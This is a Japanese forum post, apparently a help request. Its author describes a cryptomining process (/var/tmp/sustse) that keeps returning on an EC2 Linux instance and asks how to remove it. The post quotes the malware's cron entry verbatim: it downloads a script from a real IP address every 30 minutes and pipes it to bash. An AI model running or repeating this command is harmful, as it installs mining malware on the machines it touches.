ここ数日、EC2 Linux インスタンスで実行されているアプリケーションが非常に遅いことに気づきました。コマンドを実行すると、CPU の大部分を使用しているtopプロセスがあることがわかりました。/var/tmp/sustse
そのプロセスを強制終了しました。しかし、インスタンスを再起動すると、再び実行が開始され、CPU の大部分が使用されるようになりました。また、次のスクリプトの cron エントリも作成されています。
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
グーグルで調べたところ、これは暗号通貨マイニングマルウェアであることがわかりました。/var/tmp/Crontab のエントリを削除しました。ただし、Crontab のこれらのエントリはどこかから戻ってきたようで、これらのエントリを作成しているスクリプトの正確な場所をたどることができませんでした。
/var/spool/cron* エントリもクリーンアップしました。
この問題を解決するための情報をオンラインであまり見つけられませんでした。ご協力いただければ幸いです。
前もって感謝します!!